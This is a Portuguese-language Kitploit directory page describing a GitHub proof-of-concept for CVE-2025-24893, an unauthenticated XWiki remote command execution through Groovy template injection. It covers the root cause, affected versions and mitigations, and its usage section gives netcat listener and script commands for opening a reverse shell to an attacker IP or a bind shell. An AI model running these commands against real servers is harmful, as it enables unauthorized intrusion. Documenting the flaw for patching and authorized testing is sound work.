Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-24893-PoC — Prova de Conceito para CVE-2025-24893 demonstrando execução remota de comandos sem autenticação no XWiki através de avaliação insegura de templates no servidor. | Kitploit
Ferramentas/GitHubGitHub/breakingrohit/cve-2025-24893-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubbreakingrohit/cve-2025-24893-poc

CVE-2025-24893-PoC

Prova de Conceito para CVE-2025-24893 demonstrando execução remota de comandos sem autenticação no XWiki através de avaliação insegura de templates no servidor.

Ver Repositório
22há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-24893 – Execução Remota de Comandos (Prova de Conceito)

Visão Geral

Este repositório contém uma Prova de Conceito (PoC) controlada para CVE-2025-24893, uma vulnerabilidade de Execução Remota de Comandos (RCE) não autenticada que afeta o XWiki.

A vulnerabilidade permite que um invasor execute comandos arbitrários do sistema operacional no servidor devido à avaliação insegura de templates e scripts no lado do servidor.


Sobre o XWiki

XWiki é uma plataforma de wiki empresarial de código aberto comumente usada para:

  • Documentação interna
  • Bases de conhecimento
  • Portais de colaboração em equipe

Como o XWiki é frequentemente implantado em servidores voltados para a internet, vulnerabilidades de segurança em seu tratamento de requisições e lógica de scripting podem ter alto impacto no mundo real.


Resumo da Vulnerabilidade

  • CVE ID: CVE-2025-24893
  • Categoria: Injeção de Template no Lado do Servidor levando à Execução Remota de Comandos
  • Vetor de Ataque: Requisição HTTP GET
  • Autenticação Necessária: Nenhuma
  • Impacto: Execução arbitrária de comandos com privilégios de servidor

Causa Raiz

A entrada controlada pelo usuário passada para o endpoint SolrSearch foi validada e avaliada inadequadamente pelo motor de scripting Groovy. Isso permitiu que a entrada fornecida pelo invasor fosse interpretada como código executável no lado do servidor, resultando na execução de comandos no sistema host.


Versões Afetadas

  • Versões do XWiki até e incluindo 15.10.10
  • Corrigido em versões posteriores

Capacidades da Prova de Conceito

Esta PoC demonstra o seguinte:

  • Modo de Detecção de Vulnerabilidade Confirma com segurança se a instância alvo é vulnerável executando uma expressão inofensiva no lado do servidor.

  • Execução Remota de Comandos Demonstra a execução arbitrária de comandos no sistema alvo.

  • Execução de Shell Reverso Estabelece uma conexão de shell de saída do alvo para o testador.

  • Bind Shell (Opcional) Abre um shell de escuta no host alvo (menos confiável que shells reversos).


Uso

Verificação de Vulnerabilidade

root@kitploit:~
python3 xwiki_cve_2025_24893.py http://target:8080 -m check

Shell Reverso (Recomendado)

root@kitploit:~
nc -lvnp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m reverse -lh <attacker_ip> -lp 4444

Bind Shell

root@kitploit:~
python3 xwiki_cve_2025_24893.py http://target:8080 -m bind -lp 4444

Fluxo de Ataque de Alto Nível

  1. Uma requisição elaborada é enviada ao endpoint vulnerável SolrSearch
  2. Instruções de template maliciosas são injetadas via entrada controlada pelo usuário
  3. A entrada é avaliada pelo motor Groovy como código confiável
  4. Comandos arbitrários do sistema operacional são executados no servidor

Orientações de Mitigação

  • Atualize o XWiki para uma versão corrigida imediatamente
  • Restrinja o acesso a endpoints internos sempre que possível
  • Limite ou isole a funcionalidade de scripting no lado do servidor
  • Monitore os logs da aplicação em busca de comportamento anormal de execução de templates

Aviso Legal

Este projeto é fornecido estritamente para fins educacionais e testes de segurança autorizados.

Qualquer uso não autorizado deste código contra sistemas sem permissão explícita é proibido.


Créditos

  • Pesquisa original da vulnerabilidade e inspiração da PoC por Al Baradi Joy
  • Refatorado e estendido para pesquisa educacional e de segurança defensiva

Propósito deste Repositório

Este repositório foi criado para demonstrar:

  • Análise de vulnerabilidades do mundo real
  • Desenvolvimento seguro e responsável de provas de conceito
  • Compreensão dos riscos de injeção de template no lado do servidor e RCE
  • Conscientização defensiva e considerações de mitigação
Baixar ferramenta